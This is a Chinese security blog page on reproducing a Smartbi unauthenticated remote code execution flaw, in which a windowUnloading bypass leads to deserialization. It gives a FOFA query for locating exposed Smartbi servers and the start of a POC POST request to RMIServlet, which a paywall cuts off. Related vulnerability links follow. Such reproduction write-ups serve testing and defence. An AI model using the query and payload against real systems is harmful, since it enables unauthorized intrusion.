漏洞复现 || Smartbi 远程命令执行(1Day)

最新推荐文章于 2023-12-25 22:39:56 发布
最新推荐文章于 2023-12-25 22:39:56 发布
阅读量1.9k 收藏
点赞数 1
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 漏洞复现 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/131574708
版权

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
漏洞描述
Smartbi在远程未授权身份认证的情况下,可在绕过用户身份认证机制后未授权访问windowsunloging接口,且该接口存在反序列化远程代码执行漏洞随后可使用获取的身份凭证调用后台接口最终导致代码执行。
在这里插入图片描述

资产确定

fofa:app="SMARTBI"

漏洞复现

1.利用此POC出现如下响应代表存在漏洞

POST /smartbi/vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%
了解本专栏 订阅专栏 解锁全文 超级会员免费看
丢了少年失了心1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Smartbi内置用户登陆绕过漏洞复现
0xSec
06-19 4229
Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
OSCS开源安全周报第 57 期:Smartbi windowUnloading限制绕过导致远程代码执行
OSCS开源安全社区
08-28 188
OSCS 社区共收录安全漏洞 13 个,公开漏洞值得关注的是 WinRAR
关于Smartbi登录代码逻辑漏洞的动态情报
zmcxyyds的博客
12-25 1314
关于Smartbi登录代码逻辑漏洞的动态情报
Smartbi权限绕过漏洞
m0_49025459的博客
08-24 409
该文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
【严重】Smartbi windowUnloading 限制绕过导致远程代码执行 (MPS-e2z8-wdi6)
OSCS开源安全社区
08-23 288
墨知是国内首个专注软件供应链安全领域的技术社区,社区致力于为国内数百万技术人员提供全方位的软件供应链安全专业知识内容,包括软件供应链安全技术、漏洞情报、开源组件安全、SBOM、软件成分分析(SCA)、开源许可证合规等前沿技术及最佳实践。
远程 命令/代码 执行(remote command/code execute)漏洞总结
未完成的歌~的博客
08-20 7981
这周来学习下命令执行漏洞命令执行漏洞是用户通过浏览器在远程服务器上执行任意系统命令,与代码执行漏洞没有太大的区别,不过我们在学习时还是要区分不同的概念。关于代码执行漏洞会在下篇博客中详述。 一、什么是命令执行漏洞: 应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数中的参数时...
【严重】Smartbi商业智能BI软件权限绕过漏洞
murphysec的博客
08-02 433
Smartbi是一款商业智能应用,提供了数据集成、分析、可视化等功能,帮助用户理解和使用他们的数据进行决策。在Smartbi受影响版本中存在权限绕过问题,未授权的攻击者可以通过 RMI 的方式调用 getPassword 接口获取管理员token信息。获取管理员权限后,可进入后台实现任意命令执行,进而对目标系统造成破坏或篡改窃取敏感信息。
Smartbi 身份认证绕过漏洞
YJ_12340的博客
07-26 339
因为自己搭建的环境存在一些问题,可能是版本过高的原因,(奇奇怪怪的问题,用户没有权限),所以目前仅仅做概念性验证,对漏洞的原理进行分析。为什么不用原本的登录模式登录,首先原本的登录模式登录是不知道对应的账号和密码的其次我们再对原本的登录逻辑进行简单的分析。这里直接比较的是从数据库中查询出的密码,所以我们就可以直接利用内置的账号和 MD5密码登录。是从数据库中查找用户的密码,根据用户的密码开头的第一位字符,来进行处理比较。我们就注意到从数据库登录的操作也是不需要鉴权就可以进行访问的。
命令执行漏洞——远程命令执行
weixin_54055099的博客
09-17 3706
命令执行漏洞远程命令执行的基础操作
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
wps的0day漏洞复现.zip
01-05
同时,用户还应该加强网络安全意识,不随意打开未知来源的链接或文件,避免点击恶意广告或下载恶WPS For Windows 部分版本存在远程代码执行漏洞,攻击者可利用该漏洞在受害者目标主机上执行任意代码,控制主机等。...
WuThreat身份安全云-TVD每日漏洞情报-2023-03-02
wuthreat无胁科技的博客
03-02 549
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2022-31700,CNNVD-202212-3292。
2023HVV必修高危漏洞合集
tangshuangsss的专栏
08-01 645
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介最近发现个好东西分享一下,文档中包含以下漏洞检测方法,都是比较新的东西,可以说是HVV必备了。泛微 e-cology9 FileDownloadForOutDoc SQL注入漏洞 Smartbi 登录代码逻辑漏洞 nginxWebUI 远程命令执行漏洞 Smartbi 商业智能软件 绕过登录漏洞 Openfire 身...
OSCS开源安全周报第 55 期:JeecgBoot 远程代码执行漏洞
murphysec的博客
08-14 766
OSCS 社区共收录安全漏洞 11 个,公开漏洞值得关注的是 JeecgBoot 远程代码执行漏洞、企业微信私有化后台API未授权访问漏洞、WPS Office 存在代码执行漏洞(MPS-3pcb-l4mv)、Microsoft Exchange Server 远程代码执行漏洞(CVE-2023-38182)、Smartbi未授权设置Token回调地址获取管理员权限(MPS-exyg-uhi8)。Smartbi是一款商业智能应用,提供了数据集成、分析、可视化等功能,帮助用户理解和使用他们的数据进行决策。
2023.3.17 | Goby红队版可利用漏洞更新
m0_46699477的博客
03-17 8121
Nacos 身份认证绕过、泛微OA SQL注入、任意文件读取CVE-2023-26256、任意文件上传CVE-2022-39952、 天融信任意文件下载、命令执行漏洞、代码执行CVE-2022-27596、 路径穿越CVE-2022-48253、CVE-2023-25717、Aspera 远程代码执行CVE-2022-47986、SolarView Compact 、CVE-2023-23333、未授权访问、CVE-2022-31474、TurboMail文件读取、Apache默认密码....
一个CVE漏洞预警知识库
weixin_46211944的博客
09-11 306
CVE-2023-20858:VMware Carbon Black App Control 远程代码执行漏洞通告。CVE-2023-27997:Fortinet FortiOS SSL-VPN 远程代码执行漏洞通告。CVE-2023-25194:Apache Kafka Connect 远程代码执行漏洞通告。CVE-2023-25610:FortiOS & FortiProxy 远程代码执行漏洞通告。CVE-2021-42756 CVE-2022-39952:Fortinet 多个漏洞通告。
||trunc_day||
最新发布
01-26
trunc_day函数是一个日期函数,用于将给定日期截断到指定的天数。它的语法如下: ``` date_trunc('day', source) ``` 其中,source是要截断的日期。 以下是一个示例: ```sql SELECT date_trunc('day', '2021-11-15'::date); ``` 这将返回截断到天的日期,即'2021-11-15 00:00:00'。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值